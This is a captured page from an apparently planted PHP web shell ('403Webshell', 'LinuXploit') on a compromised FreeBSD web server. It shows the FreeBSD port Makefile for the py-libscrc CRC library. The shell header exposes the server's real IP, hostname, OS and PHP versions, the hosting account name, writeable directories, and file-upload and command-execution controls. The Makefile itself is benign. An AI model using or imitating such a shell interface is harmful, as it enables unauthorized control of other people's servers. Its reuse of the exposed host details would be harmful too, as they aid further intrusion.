403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/comms/py-libscrc/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/comms/py-libscrc/Makefile
PORTNAME=	libscrc
DISTVERSIONPREFIX=	v
DISTVERSION=	1.8
CATEGORIES=	comms python
PKGNAMEPREFIX=	${PYTHON_PKGNAMEPREFIX}

MAINTAINER=	zarychtam@plan-b.pwste.edu.pl
COMMENT=	Python library for calculating various types of CRC
WWW=		https://github.com/hex-in/libscrc

LICENSE=	GPLv3
LICENSE_FILE=	${WRKSRC}/LICENSE

USES=		python

USE_GITHUB=	yes
GH_ACCOUNT=	hex-in
USE_PYTHON=	autoplist distutils

TEST_ENV=	${MAKE_ENV} PYTHONPATH=${STAGEDIR}${PYTHONPREFIX_SITELIBDIR}

do-test:
	@cd ${TEST_WRKSRC} && for test in \
	libscrc/test/canx.py \
	libscrc/test/crc8.py \
	libscrc/test/crc16.py \
	libscrc/test/crc24.py \
	libscrc/test/crc32.py \
	libscrc/test/crc64.py \
	libscrc/test/crcx.py \
	libscrc/test/hacker.py \
	libscrc/test/modbus.py; \
	do ${SETENV} ${TEST_ENV} ${PYTHON_CMD} $${test}; done

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit